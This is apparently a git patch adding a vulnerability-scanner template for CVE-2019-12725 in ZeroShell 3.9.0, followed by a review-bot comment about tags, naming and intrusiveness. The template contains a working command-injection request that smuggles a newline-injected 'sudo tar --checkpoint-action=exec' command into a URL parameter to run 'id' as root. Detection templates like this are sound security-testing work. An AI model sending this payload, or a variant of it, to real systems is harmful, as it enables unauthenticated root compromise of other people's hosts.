From f9301c58085aab90bfc56f65decd0d5b45335f4e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 26 Nov 2020 11:24:02 +0700
Subject: [PATCH] :fire: Add CVE-2019-12725

---
 cves/CVE-2019-12725.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/CVE-2019-12725.yaml

diff --git a/cves/CVE-2019-12725.yaml b/cves/CVE-2019-12725.yaml
new file mode 100644
index 0000000000..00104e94ac
--- /dev/null
+++ b/cves/CVE-2019-12725.yaml
@@ -0,0 +1,27 @@
+id: cve-2019-12725
+
+info:
+  name: Zeroshell 3.9.0 Remote Command Execution
+  author: dwisiswant0
+  severity: critical
+  description: |
+    This template exploits an unauthenticated command injection vulnerability
+    found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
+    As sudo is configured to execute /bin/tar without a password (NOPASSWD)
+    it is possible to run root commands using the "checkpoint" tar options.
+  references:
+    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
+    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
\ No newline at end of file
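Review bot: The `info:` block carries no `tags:` field, so this template cannot be selected or excluded by tag filtering the way the rest of the collection is; a line such as `tags: cve,cve2019,zeroshell,rce` under `info:` would close that gap. The `id: cve-2019-12725` value also differs in case from the file name `cves/CVE-2019-12725.yaml`, which is worth aligning so the id and path stay greppable as one identifier. Since the request actually executes a command on the scanned host (the `id` payload in the path is low-impact but still remote execution as root per the description), a short sentence in `description` stating that the check is intrusive would help operators decide where it is safe to run. The `status: 200` matcher combined with `matchers-condition: and` adds no precision over the regex and could be dropped, and the file ends without a trailing newline.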